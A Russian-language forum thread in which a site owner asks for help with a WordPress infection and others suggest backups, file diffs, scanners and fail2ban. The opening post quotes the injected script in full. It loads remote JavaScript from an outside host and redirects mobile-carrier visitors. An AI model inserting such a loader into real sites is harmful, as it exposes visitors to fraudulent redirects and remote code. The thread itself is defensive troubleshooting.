Помогите! Вирус wordpress

12
U
На сайте с 02.07.2011
Offline
123
3497

Здравствуйте!

Понимаю, тема не нова, но на сайте возник вирус. Притом поиск по файлам ничего не дал.

Отрабатывает так, что в заголовок статьи добавляется скрипт

</a><script>    (function(i, s, o, g, r, a, m) {        i[r] = i[r] || function() {(i[r].q = i[r].q || []).push(arguments)};        a = s.createElement(o),m = s.getElementsByTagName(o)[0]; a.async = 1;        a.src = g; m.parentNode.insertBefore(a, m)    })(window, document, 'script', 'http://apiwm.link/e5ey7rvsy-.js', 'wapclick');    wapclick({"exclusions":["YaBrowser"]}, 'init');</script><a>

Притом редакция поста не сохраняет изменений.

Результат - пользователь, который сидит с мобильного интернета мегафон, билайн и так далее, после 15 секунд редиректиться на другой сайт (например, www4.wwwebnewss.ru, для мегафона). Помогите разобраться, в чем может быть дело.

Devvver
На сайте с 02.07.2008
Offline
662
#1

ushi, А что тут советовать? Бекап есть? Айболитом пользовались?

Мой блог. Все о создании сайтов,Seo и СДЛ ( https://devvver.ru/ ) Мой SEO телеграм канал https://t.me/seobloggers
U
На сайте с 02.07.2011
Offline
123
#2

Бекапы есть, но не понятно, когда он попал на сервер.

По айболиту всё выполнил, результата нет.

dimsog
На сайте с 08.08.2011
Offline
149
#3

Итак:

1) Хостинг виртуальный?

2) WP последняя?

3) Какая тема используется и какие плагины, откуда скачивали?

Сразу скажу, что плагины и темы это самая большая дыра в WP.

ihor vps -> ihc.ru
U
На сайте с 02.07.2011
Offline
123
#4
dimsog:
Итак:
1) Хостинг виртуальный?
2) WP последняя?
3) Какая тема используется и какие плагины, откуда скачивали?

Сразу скажу, что плагины и темы это самая большая дыра в WP.

1) Сервер.

2) Нет, 4.6.

3) Самописная тема, часть плагинов также. Остальные плагины - официальные источники.

dimsog
На сайте с 08.08.2011
Offline
149
#5

Если у вас бекапы есть, сделайте diff файлов, найдете инъекцию.

4.6 имеет уязвимости. В плагинах вы уверены? Плагины даже из оф. репозитория криво написаны.

I7
На сайте с 12.01.2018
Offline
1
#6

Я на сервере прогоняю сайт wp плагином exploit scanner(можно на локале спецом wp установить), а потом ClamWin уже на локалке.

При тщательном анализе результатов, всё становится чисто.

S
На сайте с 30.09.2016
Offline
469
#7
ushi:
Помогите разобраться, в чем может быть дело.

Сами же написали, что дело в заразе на сайте. Всё, что Вы здесь можете услышать - пустая болтовня, потому что дистанционно такие вопросы не решаются. Ищите специалиста, который Вам поможет.

Отпилю лишнее, прикручу нужное, выправлю кривое. Вытравлю вредителей.
dimsog
На сайте с 08.08.2011
Offline
149
#8

Sitealert, да и ТС косвенно сам ответил на вопрос, откуда взялись вирусы.

U
На сайте с 02.07.2011
Offline
123
#9

Всё оказалось более плачевно, но легко решаемо. После сброса root-пароля сервера дописывания в загаловки прекратились.

dimsog
На сайте с 08.08.2011
Offline
149
#10

ushi, fail2ban настройте, для защиты ssh.

12

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий